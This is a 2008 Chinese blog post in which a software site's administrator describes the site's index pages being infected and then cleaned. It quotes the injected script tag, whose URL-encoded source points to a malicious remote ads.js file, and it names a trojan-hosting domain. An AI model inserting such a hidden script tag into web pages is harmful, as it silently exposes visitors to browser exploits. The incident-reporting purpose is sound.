本网站被值入病毒代码,现已经恢复正常--搜索引擎研究和软件技术分享-管理员博客

本网站被值入病毒代码,现已经恢复正常

[ 2008-6-16 19:50:00 | By: whsjsoft ]

今天下午5点四十左右，同事打开首佳软件网站主页，瑞星的网页监控报告网站含有病毒。据瑞星提示该恶意网页病毒名称为：Hack.Exploit.Swf.a。

打开网页时显示的加载网址为：jnwenchuan.cn，从这个网站中加载了好几个页面。随后，被瑞星拦截，连续杀了几个后，IE发生错误被关闭了。

打开网站出现此类病毒问题的原因是网站程序中含有病毒代码。把index.asp用FTP下载到本地打开后一看，在网页程序的最后果然有一段来历不明的代码：<script src='http://%77%77%77%2E%71%75%67%75%70%69%61%6F%2E%63%6E/%61%64%73%2E%6A%73'></script>
将这段删除后再上传上去，打开IE来测然后报病毒。在FTP中查到还有其它文件被修改，时间是2008-06-16 17：32的，这个时间我们没有修改过网页，应该是网站主机被值入木马恶意修改的。经过整站检查，发现这个病毒遍历了整个网站目录，只要找到index.asp\index.htm\index.html\default.asp\default.html等默认的首页程序就修改它，在代码最后加上面那段代码，让你的整个网站陷入病毒的包围。

经过半个小时的修复，网站正常了。这个病毒程序还将Oblo系统建立的每一个用户目录下的index.html文件修改了，还好oblog管理后台有一个生成静态用户页面的功能，重新生成一次后，将所有病毒代码清除了。好省点事！

jnwenchuan.cn这个垃圾网站，完全是一个挂木马程序的网站，打开它还故作无故的样子，提示说：通知由于网站被黑客非法入侵，网站暂停开放，开放时间另行通知！
根本就是一个没有人访问的网站，除了中病毒的第三方网站加载这个网站的病毒页面时算是有人访问。如果是一个负责的网站，正常运作的网站，这类病毒早就应该清掉了，还需要挂个这种提示出来？这类站长太无耻了！

阅读全文(1090) | 回复(0) |反映问题 | 引用通告(0) | 编辑

分享按钮

标签：网站安全

上一篇：首佳汽车维修软件网荣登百度精品网站汽车排行榜
下一篇：汽车维修管理博客将禁止引用通告及游客留言功能

Re:本网站被值入病毒代码,现已经恢复正常

[ 2008-6-16 21:26:00 | By: whsjsoft ]

另外从加载的地址中显示有来自jnwenchuan.cn/flash/index.htm的，这个页面写有程序，这种病毒是针对IE浏览器的。

个人主页 | 引用 | 返回 | 删除 | 回复

分享按钮

发表评论：